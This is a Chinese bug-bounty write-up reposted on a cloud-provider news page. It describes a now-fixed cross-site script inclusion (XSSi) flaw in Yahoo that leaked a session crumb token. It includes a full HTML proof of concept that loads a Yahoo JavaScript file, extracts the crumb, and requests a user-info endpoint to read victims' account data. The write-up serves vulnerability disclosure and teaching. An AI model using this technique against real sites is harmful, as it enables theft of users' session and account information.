溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

發(fā)現(xiàn)雅虎XSSi漏洞實(shí)現(xiàn)用戶信息竊取的示例分析

發(fā)布時間:2021-12-18 14:26:07 來源:億速云 閱讀:140 作者:柒染 欄目:網(wǎng)絡(luò)管理

本篇文章為大家展示了發(fā)現(xiàn)雅虎XSSi漏洞實(shí)現(xiàn)用戶信息竊取的示例分析,內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細(xì)介紹希望你能有所收獲。

發(fā)現(xiàn)某種特定類別漏洞由兩個關(guān)鍵部分組成,那就是對漏洞的認(rèn)知以及挖掘的難易程度??缯灸_本包含漏洞(XSSi)在公認(rèn)的安全標(biāo)準(zhǔn)OWASP TOP 10中并未被提及,而且它也沒有一些公開可利用的工具。但它的影響涉及個人存儲信息泄露、token保護(hù)機(jī)制繞過以及賬戶劫持等。目前來說,由于XSSi漏洞存在廣泛且缺乏有效的檢測手段,導(dǎo)致其漏洞危害程度增加。下面我將分享我發(fā)現(xiàn)的一個雅虎XSSi漏洞,利用該漏洞可以實(shí)現(xiàn)對雅虎用戶的信息竊取。

端倪

在參與雅虎(Yahoo)漏洞眾測項(xiàng)目中,在我某次用BurpSuite來進(jìn)行抓包分析時,偶然看到了以下這個請求:

發(fā)現(xiàn)雅虎XSSi漏洞實(shí)現(xiàn)用戶信息竊取的示例分析

在我發(fā)現(xiàn)這是一個JSONP服務(wù)端之后,我立馬意識到這可能會形成一個XSSi漏洞(跨站腳本包含)。在雅虎網(wǎng)站API中,.crumb 值其實(shí)就是一個隨機(jī)字符串,它與用戶的session和身份驗(yàn)證值相關(guān),我注意到,如果在該請求中,GET參數(shù) .crumb 值無效的話,其響應(yīng)如下:

發(fā)現(xiàn)雅虎XSSi漏洞實(shí)現(xiàn)用戶信息竊取的示例分析

利用

現(xiàn)在,我想,如果能以某種方式去竊取到受害者的有效.crumb 值的話,那么就能竊取到對方的具體賬號信息值了。因此,我就在BurpSuite的抓包中來查找所有包含有效 .crumb 值的請求,最終,我發(fā)現(xiàn)了在某個動態(tài)的Javascript文件存在這樣的信息,該Javascript文件位于https://messenger.yahoo.com/embed/app.js。如果你現(xiàn)在去檢查這個Javascript文件,你會發(fā)現(xiàn)它其中的    logoutCrumb 值已經(jīng)被刪除修復(fù)了,我初次發(fā)現(xiàn)時,它的源代碼如下: 

發(fā)現(xiàn)雅虎XSSi漏洞實(shí)現(xiàn)用戶信息竊取的示例分析

現(xiàn)在,XSSi 漏洞原理其實(shí)是這樣的,它允許攻擊者繞過原始邊界竊取特定類型數(shù)據(jù),利用了<script>標(biāo)記的src屬性來突破同源策略( SOP),也即在<script>標(biāo)記中,瀏覽器不會阻止網(wǎng)頁加載圖像和文字等第三方資源。因此,為了竊取    https://messenger.yahoo.com/embed/app.js中的有效回調(diào) .crumb 值,然后把它放置在鏈接https://jsapi.login.yahoo.com/w/device_users?.crumb=POR1.kRjsx中進(jìn)行請求,以獲取到相關(guān)用戶的session信息,我編寫了如下PoC代碼:

<html>    <head>        <title>Yahoo XSSi PoC</title>    </head>    <body>               <div >            <h2 >Proof of Concept</h2>            <b>Dataset 1:</b>            <div id="content1" ></div>            <br/>            <b>Dataset 2:</b>            <div id="content2" ></div>        </div>        <script>            function processDeviceUsers(data) {                document.getElementById("content1").innerHTML = JSON.stringify(data);            }            window.onload = function () {                var config = {};                config_data = {};                config.merge = function(data) { config_data = data };                iris.initConfig(config);                document.getElementById("content2").innerHTML =  JSON.stringify(config_data);                var src = "https://jsapi.login.yahoo.com/w/device_users?.crumb=" + config_data.session.logoutCrumb;                var s = document.createElement('script');                s.setAttribute('src', src);                document.body.appendChild(s);            }           </script>        <script src="https://messenger.yahoo.com/embed/app.js"></script>        <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>    </body></html>

以下就是測試的效果圖:

發(fā)現(xiàn)雅虎XSSi漏洞實(shí)現(xiàn)用戶信息竊取的示例分析

上述內(nèi)容就是發(fā)現(xiàn)雅虎XSSi漏洞實(shí)現(xiàn)用戶信息竊取的示例分析,你們學(xué)到知識或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識儲備,歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI